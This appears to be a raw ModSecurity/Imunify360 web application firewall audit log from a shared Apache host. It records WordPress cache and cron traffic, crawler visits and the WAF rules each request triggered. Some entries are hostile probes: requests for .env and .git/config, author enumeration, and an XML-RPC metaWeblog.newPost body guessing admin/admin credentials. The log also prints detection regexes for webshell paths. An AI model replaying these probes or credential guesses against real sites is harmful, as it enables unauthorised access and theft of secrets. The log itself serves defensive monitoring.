--394f2562-Z-- --4a08d220-A-- [01/Jul/2025:08:14:59.291736 +0530] aGNLqcEIEZFNpjXUoBInigAAACw 103.185.74.40 53462 192.168.74.40 443 --4a08d220-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --4a08d220-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --4a08d220-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751337897861518 1430924 (- - -) Stopwatch2: 1751337897861518 1430924; combined=2236, p1=118, p2=1948, p3=0, p4=0, p5=169, sr=50, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --4a08d220-Z-- --50b1c572-A-- [01/Jul/2025:08:14:59.956224 +0530] aGNLqhBD6plbSAZbX5RS4QAAAA8 68.183.152.21 51865 192.168.74.40 443 --50b1c572-B-- GET //?author=2 HTTP/1.1 Host: kutility.com Keep-Alive: 300 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Accept-Language: en-US,en;q=0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 --50b1c572-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Keep-Alive: timeout=5, max=100 Connection: Keep-Alive -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751339736981430 14655 (- - -) Stopwatch2: 1751339736981430 14655; combined=2768, p1=145, p2=2460, p3=0, p4=0, p5=163, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --7d9b855f-Z-- --9b6a835b-A-- [01/Jul/2025:08:45:39.689175 +0530] aGNS08jpJEqv1Qd8u_SFIQAAADc 103.185.74.40 4613 192.168.74.40 443 --9b6a835b-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --9b6a835b-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --9b6a835b-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751339731136985 8552816 (- - -) Stopwatch2: 1751339731136985 8552816; combined=2901, p1=86, p2=2613, p3=0, p4=0, p5=183, sr=53, sw=19, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --9b6a835b-Z-- --cb766070-A-- [01/Jul/2025:08:45:40.195841 +0530] aGNS2EY5SfbFVO4WKgSSTAAAAAo 103.185.74.40 62189 192.168.74.40 443 --cb766070-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --cb766070-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --cb766070-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751339736138141 4058215 (- - -) Stopwatch2: 1751339736138141 4058215; combined=2095, p1=82, p2=1860, p3=0, p4=0, p5=153, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --cb766070-Z-- --cd4cc77b-A-- [01/Jul/2025:08:45:40.294812 +0530] aGNS3JhasU9Fd1tVN-9MiAAAAAc 170.106.148.137 53964 192.168.74.40 80 --cd4cc77b-B-- GET / HTTP/1.1 Host: www.oricast.com User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --6dc1f11b-Z-- --c5162020-A-- [01/Jul/2025:09:19:37.831794 +0530] aGNa0apiZ00_S-DQtUqQywAAAA0 162.243.75.54 46370 192.168.74.40 80 --c5162020-B-- GET /.git/config HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* Accept-Encoding: gzip --c5162020-F-- HTTP/1.1 404 Not Found Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Transfer-Encoding: chunked Content-Type: text/html --c5162020-H-- Message: Match of "rx /wp-content/plugins/all-in-one-wp-migration/lib/view/assets/javascript/backups.min.js" against "REQUEST_URI" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/002_i360_basic.conf"] [line "12"] [id "77140739"] [msg "IM360 WAF: [RBL] Dirb like fuzzing||MVN:REQUEST_URI||MV:/.git/config||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Message: String match "/.git/" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "349"] [id "77318034"] [msg "IM360 WAF: Blocked access to git folder||RSV:7.05||RS:0||T:APACHE||MV:/.git/config||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: default-handler Stopwatch: 1751341777819947 12099 (- - -) Stopwatch2: 1751341777819947 12099; combined=4511, p1=118, p2=4238, p3=0, p4=0, p5=154, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --c5162020-Z-- --db184808-A-- [01/Jul/2025:09:19:38.354020 +0530] aGNa0ifVvbXKOf71QoDLAwAAABE 162.243.75.54 46380 192.168.74.40 80 --db184808-B-- GET /.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* Accept-Encoding: gzip --db184808-F-- HTTP/1.1 403 Forbidden Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Transfer-Encoding: chunked Content-Type: text/html --db184808-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Message: Operator EQ matched 1 at TX:trapped. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/000_i360_init.conf"] [line "74"] [id "33329"] [msg "IPRec: G: P: F:||RSV:7.05||RS:403||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Action: Intercepted (phase 2) Apache-Handler: default-handler Stopwatch: 1751341778349967 4268 (- - -) Stopwatch2: 1751341778349967 4268; combined=1264, p1=109, p2=605, p3=0, p4=0, p5=550, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --db184808-Z-- --d31d4678-A-- [01/Jul/2025:09:19:38.611340 +0530] aGNa0gOhMQ_WrfEBMDsEpAAAAC0 20.171.207.232 34616 192.168.74.40 443 --d31d4678-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/rajasthan-tours-from-agra/Rajasthan-Travel-Guides/aainag/images/hotels-in-rajasthan.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --d31d4678-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --d31d4678-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/rajasthan-tours-from-agra/Rajasthan-Travel-Guides/aainag/images/hotels-in-rajasthan.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/rajasthan-tours-from-agra/Rajasthan-Travel-Guides/aainag/images/hotels-in-rajasthan.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/rajasthan-tours-from-Jaisalmer||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751341778592907 18529 (- - -) Stopwatch2: 1751341778592907 18529; combined=4332, p1=177, p2=3967, p3=0, p4=0, p5=187, sr=62, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751343915954750 1110537 (- - -) Stopwatch2: 1751343915954750 1110537; combined=3661, p1=140, p2=3329, p3=0, p4=0, p5=192, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --d75a8660-Z-- --11c69c59-A-- [01/Jul/2025:09:55:22.790955 +0530] aGNjMlbzRQNq4bHvdUEa0QAAAB4 103.185.74.40 34157 192.168.74.40 443 --11c69c59-B-- POST /wp-cron.php?doing_wp_cron=1751343922.5536429882049560546875 HTTP/1.1 Host: thewizblog.com User-Agent: WordPress/6.8.1; https://thewizblog.com Accept: */* Accept-Encoding: deflate, gzip Connection: close Content-Length: 0 Content-Type: application/x-www-form-urlencoded --11c69c59-C-- --11c69c59-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --11c69c59-H-- Message: Operator EQ matched 1 at TX:trapped. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/000_i360_init.conf"] [line "74"] [id "33329"] [msg "IPRec: G:doing_wp_cron=1751343922.5536429882049560546875& P: F:||RSV:7.05||RS:200||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751343922768846 23938 (- - -) Stopwatch2: 1751343922768846 23938; combined=7238, p1=205, p2=6271, p3=237, p4=4, p5=520, sr=50, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --11c69c59-Z-- --2b7cc37c-A-- [01/Jul/2025:09:55:22.813827 +0530] aGNjMP7a9-MbDP0GTS8zQgAAABA 36.224.220.27 6498 192.168.74.40 443 --2b7cc37c-B-- POST /xmlrpc.php HTTP/1.1 Connection: Keep-Alive Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: zh-Hant-TW,zh-Hant;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Content-Length: 680 Host: brewandfly.com --2b7cc37c-C-- <?xml version="1.0"?><methodCall><methodName>metaWeblog.newPost</methodName><params><param><value><string>1</string></value></param><param><value><string>admin</string></value></param><param><value><string>admin</string></value></param><param><value><struct><member><name>title</name><value><string>0x1c8c5b6a</string></value></member><member><name>description</name><value><string>0x1c8c5b6a</string></value></member><member><name>mt_keywords</name><value><string>0x1c8c5b6a</string></value></member><member><name>mt_excerpt</name><value><string>0x1c8c5b6a</string></value></member></struct></value></param><param><value><boolean>1</boolean></value></param></params></methodCall> --2b7cc37c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Connection: close -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751344320105815 16971 (- - -) Stopwatch2: 1751344320105815 16971; combined=2742, p1=108, p2=2461, p3=0, p4=0, 
p5=173, sr=51, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --075bb601-Z-- --48b7ad79-A-- [01/Jul/2025:10:02:00.124596 +0530] aGNkwPdfsj9lloMIsSmhVwAAAAQ 103.185.74.40 4458 192.168.74.40 443 --48b7ad79-B-- POST /wp-cron.php?doing_wp_cron=1751344319.8891799449920654296875 HTTP/1.1 Host: shreyamouldcrafts.com User-Agent: WordPress/6.8.1; https://shreyamouldcrafts.com Accept: */* Accept-Encoding: deflate, gzip Connection: close Content-Length: 0 Content-Type: application/x-www-form-urlencoded --48b7ad79-C-- --48b7ad79-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --48b7ad79-H-- Message: Pattern match "fff[7-9a-d]$" at UNIQUE_ID. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "193"] [id "77316842"] [msg "IM360 WAF: Performance measurement||Method:POST||Perf all:combined=7833, p1=380, p2=7227, p3=222, p4=4, p5=0, sr=108, sw=0, l=0, gc=0||Py scan:15955||Lua scan:||RBL:||RSV:7.05||RS:200||T:APACHE||Content-Length:0||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751344320096373 28680 (- - -) Stopwatch2: 1751344320096373 28680; combined=8102, p1=380, p2=7227, p3=222, p4=4, p5=268, sr=108, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --48b7ad79-Z-- --569c0f2f-A-- [01/Jul/2025:10:02:01.723144 +0530] aGNkwbjtQEgMl2VdjwuWhQAAAA0 57.141.0.23 38950 192.168.74.40 443 --569c0f2f-B-- GET /Packages/Rajasthan-Travel-Guides/rajasthan-tours-from-agra/rajasthan-tours-from-agra/images/Rajasthan-Travel-Guides/rajasthan-tours-from-agra/Rajasthan-Travel-Guides/Shekhawati-City-Guide.php HTTP/1.1 Accept: */* User-Agent: meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler) Host: abhaytravelsindia.digitaltheka.com Connection: keep-alive --569c0f2f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --569c0f2f-H-- -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --4b9a9258-Z-- --2c0eaa26-A-- [01/Jul/2025:10:07:15.173348 +0530] aGNl-iEfn2nueSOFoWcnWQAAABk 196.251.83.206 57316 192.168.74.40 443 --2c0eaa26-B-- GET /.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Linux; Android 5.1; OPPO A59s Build/LMY47I; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.126 MQQBrowser/6.2 TBS/044813 Mobile Safari/537.36 MMWEBID/6148 MicroMessenger/7.0.6.1460(0x27000634) Process/tools NetType/WIFI Language/zh_CN Accept-Charset: utf-8 Accept-Encoding: gzip Connection: close --2c0eaa26-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Encoding: gzip Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --2c0eaa26-H-- Message: Access denied with code 403 (phase 2). 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751344634398305 775476 (- - -) Stopwatch2: 1751344634398305 775476; combined=759, p1=94, p2=517, p3=0, p4=0, p5=148, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --2c0eaa26-Z-- --e49c647c-A-- [01/Jul/2025:10:07:18.537464 +0530] aGNl_LyvB-Gc8S6YH6T5DgAAACE 150.109.230.210 43062 192.168.74.40 80 --e49c647c-B-- GET / HTTP/1.1 Host: archanacomponents.com User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache Upgrade-Insecure-Requests: 1 --e49c647c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --e49c647c-H-- -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --f0cb221f-Z-- --ccae4908-A-- [01/Jul/2025:10:09:08.642977 +0530] aGNmbNOCUIdzZW29MeQ4hwAAAC8 43.156.109.53 51390 192.168.74.40 80 --ccae4908-B-- GET / HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache Upgrade-Insecure-Requests: 1 --ccae4908-F-- HTTP/1.1 200 OK Last-Modified: Wed, 17 Jun 2020 20:01:33 GMT Accept-Ranges: bytes Content-Length: 163 Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Connection: close Content-Type: text/html --ccae4908-H-- Message: Pattern match "\\b(close|keep-alive),[\\t\\n\\r ]{0,1}(close|keep-alive)\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/013_i360_generic.conf"] [line "86"] [id "77210350"] [msg "IM360 WAF: Multiple/Conflicting Connection Header Data Found||MVN:REQUEST_HEADERS:Connection||MV:keep-alive, close||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "\\b(?:keep-alive|close),\\s?(?:keep-alive|close)\\b" at REQUEST_HEADERS:Connection. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "138"] [id "77350508"] [msg "IM360 WAF: Suspicious Connection Header||MV:keep-alive, close||RSV:7.05||RS:200||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Stopwatch: 1751344748637420 6069 (- - -) Stopwatch2: 1751344748637420 6069; combined=2873, p1=102, p2=2541, p3=91, p4=2, p5=137, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --ccae4908-Z-- --35720e1f-A-- [01/Jul/2025:10:09:08.756894 +0530] aGNmbCQiesNCQGCD2TgXFwAAADY 18.213.102.186 2376 192.168.74.40 443 --35720e1f-B-- GET /pps/product/sbrite-microfiber-multipurpose-wipe HTTP/1.1 Connection: close Host: bmschool.in User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --35720e1f-F-- HTTP/1.1 403 Forbidden Content-Length: 318 Connection: close Content-Type: text/html; charset=iso-8859-1 --35720e1f-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "432"] [id "77350440"] [msg "IM360 WAF: Scan attempt by Amazon bot||Range:||RSV:7.05||RS:0||T:APACHE||"] [severity "CRITICAL"] [tag "service_im360"] Message: Operator EQ matched 1 at TX:trapped. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/000_i360_init.conf"] [line "74"] [id "33329"] [msg "IPRec: G: P: F:||RSV:7.05||RS:403||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Action: Intercepted (phase 2) -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751345110511978 1319954 (- - -) Stopwatch2: 1751345110511978 1319954; combined=4244, p1=103, p2=3385, p3=0, p4=0, p5=755, sr=47, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --f28c312f-Z-- --21b61c3b-A-- [01/Jul/2025:10:15:14.298899 +0530] aGNn2U2iOLYJJIAs-GUhWQAAADY 103.185.74.40 59990 192.168.74.40 443 --21b61c3b-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --21b61c3b-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --21b61c3b-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751345113014920 1284398 (- - -) Stopwatch2: 1751345113014920 1284398; combined=2870, p1=97, p2=2541, p3=0, p4=0, p5=232, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --21b61c3b-Z-- --b889760f-A-- [01/Jul/2025:10:15:15.673507 +0530] aGNn2otSrxFvROx86UNn7AAAABg 103.185.74.40 35627 192.168.74.40 443 --b889760f-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --b889760f-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --b889760f-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751345114508797 1165139 (- - -) Stopwatch2: 1751345114508797 1165139; combined=2625, p1=98, p2=2346, p3=0, p4=0, p5=181, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
